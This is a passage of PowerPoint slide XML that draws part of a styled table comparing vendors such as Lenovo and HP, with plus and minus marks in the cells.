                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="E63451"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="E63451"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="404925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>Lenovo</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>RP</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="404925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>HP</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="lt1"/>
                        </a:buClr>
                        <a:buSzPct val="25000"/>
                        <a:buFont typeface="Roboto Condensed"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Condensed"/>
                          <a:ea typeface="Roboto Condensed"/>
                          <a:cs typeface="Roboto Condensed"/>
                          <a:sym typeface="Roboto Condensed"/>
                        </a:rPr>
                        <a:t>+</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="12700">
                      <a:solidFill>
                        <a:srgbClr val="77B82A"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
